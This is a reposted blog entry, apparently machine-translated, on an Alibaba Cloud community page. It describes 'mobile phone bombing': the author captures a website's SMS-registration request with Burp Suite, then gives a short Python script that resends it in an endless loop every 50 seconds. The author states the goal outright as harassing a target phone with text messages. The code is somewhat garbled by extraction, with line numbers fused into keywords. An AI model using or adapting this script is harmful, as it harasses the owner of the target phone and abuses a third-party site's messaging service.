DAY3 Python Bulk SMS

Source: Internet
Author: User

Mobile phone bombing, burpsuit crawl registration page Input mobile phone number, and then every click Once ForWord, are open to release, texting. can also send to repeat inside to carry on, repeat sends the text message.

1 ImportRequests2 Import Time3s =requests. Session ()4data ="phone=**********"5headers = {6     'useragent':'mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/49.0.2623.110 safari/537.36',7     'Content-type':'application/x-www-form-urlencoded; Charset=utf-8',8     'Referer':'http://www.otryin.com/',9 }Ten  whileTrue: OneS.post (url="Http://www.otryin.com/sendMessage", data=data,headers=headers) A     Print '---'. Join (['Send Message sucess', data]) -Time.sleep (50)

After a long day finally came out, to achieve every 50 seconds, a mobile phone to carry out SMS harassment. function needs to be improved.

Note: You need to assign a value to the phone and run the Python req.py

Result: The phone is crazy.

DAY3 Python Bulk SMS

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.